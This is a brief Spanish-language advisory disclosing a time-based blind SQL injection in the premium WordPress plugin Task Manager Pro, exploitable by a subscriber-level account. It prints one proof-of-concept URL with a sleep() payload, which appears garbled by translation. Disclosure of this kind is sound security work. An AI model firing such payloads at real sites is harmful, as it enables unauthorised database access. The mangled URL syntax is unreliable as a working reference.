Vulnerabilidad Plugin: WordPress Task Manager Pro

ATENCIÓN: Plugin Premium. Este plugin NO PERTENECE
al Repositorio Oficial de WordPress.

Blind SQL Injection en el parámetro de tareas de la página de detalles de tareas.
Al registrarse como seguidor se puede hacer el ataque por inyección de código malicioso por SQL:
https: //localhost/wp/wp-admin/admin.php? Page = tarea-detalles & tarea = 6 + y + sleep (1) + y + 1% 3D1

Dejar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Ir arriba